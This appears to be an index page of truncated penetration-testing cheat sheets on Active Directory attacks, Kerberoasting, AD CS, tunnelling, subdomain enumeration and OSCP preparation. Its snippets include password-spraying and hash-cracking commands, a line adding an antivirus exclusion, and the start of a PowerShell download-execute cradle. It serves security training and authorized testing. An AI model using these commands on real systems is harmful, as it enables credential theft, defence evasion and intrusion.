Kerberos Attacks cheatsheet Bruteforcing With kerbrute.py: python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file&g...

🛠️ Under Constructions Useful Tools In the following table, some popular and useful tools for Windows local privilege escalation are presented: Name Language Author ...

Installation From Source Github Ligolo-MP git clone https://github.com/ttpreport/ligolo-mp cd ligolo-mp sudo make install sudo ligolo-mp From Release Download Binary From Release ligolo-mp_linux_...

AD ACLs Cheatsheet GenericWrite on User Targeted Kerberoasting targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user hashcat -m 13100 -a 0 <...

Certipy - AD CS Attack & Enumeration Toolkit Installation Certipy Using pip $ sudo apt update && sudo apt install -y python3 python3-pip $ python3 -m venv certipy-venv $ source certipy...

Installation Using uv uv tool install bloodyAD Using pipx pipx install bloodyAD Usage Retrieve User Information bloodyAD --host $dc -d $domain -u $username -p $password get object $target_usernam...

Subdomain Enumeration Basic Subdomain Discovery Discovers subdomains using subfinder with recursive enumeration and saves results to a file. subfinder -d example.com -all -recursive > subexam...

Bug Bounty Handbook Resources Table of Contents Automated Subdomain Monitoring Burp Suite Extensions JavaScript Enumerate Subdomains, Web Servers and API Endpoints Find CNAME Reco...

OSCP Cheat Sheet Table of Contents Basics Information Gathering Vulnerability Analysis Web Application Analysis Database Assessment Password Attacks Exploitation Tools Post Explo...

Load a PowerShell script using dot sourcing . C:\AD\Tools\PowerView.ps1 Add Exclusion path to antivirus PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" Download execute cradle iex (New-...